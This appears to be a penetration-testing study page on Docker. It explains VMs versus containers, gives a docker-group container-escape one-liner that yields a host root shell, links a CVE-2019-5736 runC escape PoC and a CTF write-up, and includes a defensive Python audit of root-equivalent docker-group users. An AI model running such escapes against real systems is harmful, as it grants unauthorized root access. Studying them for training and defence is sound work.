# Docker

## VM vs. Container

A virtual machine (VM) runs on a hypervisor, a piece of software that creates and runs VMs. There are two types of hypervisor:

* **Type-1** (native or bare-metal): runs directly on the physical layer, such as a server. Examples: VMware ESXi, Microsoft Hyper-V and Xen.
* **Type-2** (hosted): runs on top of a conventional OS. Examples: VMware Workstation or Oracle VirtualBox.

Each VM contains an application and an independent OS, whereas each Docker container contains only an application: all Docker containers on a host share the same OS kernel (which is also why a container escape, such as the ones below, yields access to the host). This makes containers much more resource-efficient than VMs. Docker containers are typically smaller than 100 MB, whereas VMs are often larger than 10 GB.

## Docker Group

From GTFOBins:

![GTFOBins docker escape](/files/-Mg22Claz4qd-TWmwP1U)

If we are in the `docker` group, we can try to spawn a root shell on the host with the following payload (it bind-mounts the host's `/` into the container and chroots into it):

```bash
docker run -v /:/mnt --rm -it bash chroot /mnt sh
```
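As an added defender-side check that is not part of the original page: a small Python audit that parses `/etc/group` and the Docker socket's permissions to report which users are root-equivalent through `docker` group membership. The sample group file, socket mode and gid below are constructed for the demo; `audit_live_host()` runs the same logic against the real host.

```python
import os
import stat

# Constructed sample of /etc/group content for the demo; a real audit reads the host file.
SAMPLE_GROUP_FILE = """\
root:x:0:
sudo:x:27:alice
docker:x:999:alice,bob
users:x:100:
"""

def parse_docker_group(group_text):
    """Return (gid, members) for the docker group in /etc/group-style text, or (None, [])."""
    for line in group_text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[0] == "docker":
            return int(fields[2]), [m for m in fields[3].split(",") if m]
    return None, []

def socket_exposure(mode, sock_gid, docker_gid):
    """Classify who can write to the Docker socket from its st_mode and owning gid."""
    if mode & stat.S_IWOTH:
        return "world-writable"         # any local user can drive the daemon
    if sock_gid == docker_gid and mode & stat.S_IWGRP:
        return "docker-group-writable"  # every docker group member is root-equivalent
    return "root-only"

def audit(group_text, sock_mode, sock_gid):
    """Combine both checks: docker group members who can reach the socket are root-equivalent,
    because they can run the bind-mount-and-chroot pattern shown above."""
    docker_gid, members = parse_docker_group(group_text)
    exposure = socket_exposure(sock_mode, sock_gid, docker_gid)
    root_equivalent = members if exposure == "docker-group-writable" else []
    return {"docker_gid": docker_gid, "members": members,
            "socket": exposure, "root_equivalent": root_equivalent}

def audit_live_host(group_path="/etc/group", sock_path="/var/run/docker.sock"):
    """Run the audit against the current host; returns None if there is no Docker socket."""
    if not os.path.exists(sock_path):
        return None
    st = os.stat(sock_path)
    with open(group_path) as fh:
        return audit(fh.read(), st.st_mode, st.st_gid)

if __name__ == "__main__":
    print(audit(SAMPLE_GROUP_FILE, 0o660, 999))   # constructed socket mode/gid
    print(audit_live_host())
```

Any user reported under `root_equivalent` should be treated as an administrator in access reviews, and a `world-writable` socket is a misconfiguration to fix immediately.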

## RunC Exploit (CVE-2019-5736)

From HackTricks:

![Runc exploit - HackTricks](/files/-Mg22roDvqYKkHnmYrAn)

If `sudo -l` shows that we are able to run `docker exec` as root, then we can try to escape the Docker container using **CVE-2019-5736** (a runC vulnerability that lets a malicious container overwrite the host's `runc` binary when a privileged user attaches to it). The PoC is on GitHub:

{% embed url="https://github.com/Frichetten/CVE-2019-5736-PoC" %}
CVE-2019-5736 PoC
{% endembed %}

To learn more about the theory behind this PoC, read Dragon Sector's blog:

{% embed url="https://blog.dragonsector.pl/2019/02/cve-2019-5736-escape-from-docker-and.html" %}
CVE-2019-5736 - Dragon Sector
{% endembed %}

## Challenge: TryHackMe - UltraTech

{% embed url="https://www.ctfwriteup.com/tryhackme/tcm-linux-privesc-course/ultratech-medium" %}
TryHackMe - UltraTech
{% endembed %}
